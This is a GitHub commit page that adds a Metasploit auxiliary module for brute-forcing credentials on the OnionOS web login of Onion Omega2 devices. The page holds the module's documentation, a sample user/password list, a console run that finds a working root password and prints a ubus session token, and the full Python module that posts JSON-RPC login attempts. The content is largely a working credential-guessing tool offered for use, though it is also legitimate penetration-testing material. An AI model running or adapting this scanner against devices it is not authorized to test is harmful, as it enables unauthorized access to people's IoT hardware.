Skip to content
Permalink
Browse files

Land #11661, Onion Omega2 login scanner

  • Loading branch information...
jrobles-r7 committed May 21, 2019
2 parents 14fb26a + cf6c57c commit 6775685c089ab260294c6c5a96932f395e1bd642
@@ -0,0 +1,72 @@
## Description
The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.

## Vulnerable Application
* Onion Omage2 HTTPd Service

![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)

![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)

## Verification Steps
1. Plug your Onion Omega2 device to a power source.
- First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
2. Connect to its Wi-Fi network.
3. Start `msfconsole`
4. Do: `use auxiliary/scanner/http/onion_omega2_login`
5. Do: `set RHOSTS 192.168.3.1`
6. Do: `set USERPASS_FILE <user pass dictionary>`
- username and password seperated by space and one pair per line.
7. Do: `run`

Sample userpass file:
```text
root 123456
root password
root 123456789
root 12345678
root 12345
root 10601
root qwerty
root 123123
root 111111
root abc123
root 1234567
root dragon
root 1q2w3e4r
root sunshine
root 654321
root master
```

## Scenario
```
msf5 > use auxiliary/scanner/http/onion_omega2_login
msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
RHOSTS => 192.168.3.1
msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
USERPASS_FILE => something.txt
msf5 auxiliary(scanner/http/onion_omega2_login) > run
[*] Running for 192.168.3.1...
[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
[!] No active DB -- Credential data will not be saved!
[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
[*] 192.168.3.1:80 - [16/16] - root:master - Failure
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,82 @@
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# 2019-03-27 05-55

# Standard Modules
from metasploit import module, login_scanner
import json

# Extra Modules
dependencies_missing = False
try:
import requests
except ImportError:
dependencies_missing = True

# Metasploit Metadata
metadata = {
'name': 'Onion Omega2 Login Brute-Force',
'description': '''
OnionOS login scanner module for Onion Omega2 devices.
''',
'authors': [
'Not So Attractive <github.com/nsa>'
],
'date': '2019-03-27',
'license': 'MSF_LICENSE',
'references': [
],
'type': 'single_host_login_scanner',
'options': {
'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},
'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},
'userpass': {'type': 'string', 'description': 'A list of username/password combinations to try',
'required': False},
'sleep_interval': {'type': 'float', 'description': 'Time in seconds to wait between login attempts',
'required': False}
},
'service_name': 'Onion Omega2 HTTPd Ubus',
}


def valid_login(host, rport, username, password):
payload = {
"jsonrpc": "2.0", "id": 0, "method": "call", "params": ["0" * 32, "session", "login",
{
"username": username,
"password": password
}]}
url = 'http://' + str(host) + ':' + str(rport) + '/ubus'
session = requests.Session()
try:
request = session.post(url, json=payload)
response = json.loads(request.text)
if response['result'][0] != 6 and len(response['result']) > 1:
ubus_rpc_session = response['result'][1]['ubus_rpc_session']
module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')
else:
return False
except requests.exceptions.ConnectionError:
module.log("Unhandled exception: ConnectionError", level='error')
return False
except ValueError:
module.log("Unhandled exception: Response JSON DecodeError", level='error')
return False
except KeyError:
module.log("Unhandled exception: Dictionary KerError in Response", level='error')
return False
else:
return True


def run(args):
if dependencies_missing:
module.log('Python requests module missing, cannot continue', level='error')
return
scanner = login_scanner.make_scanner(
lambda host, rport, username, password: valid_login(host, rport, username, password))
scanner(args)


if __name__ == '__main__':
module.run(metadata, run)

0 comments on commit 6775685

Please sign in to comment.
You can’t perform that action at this time.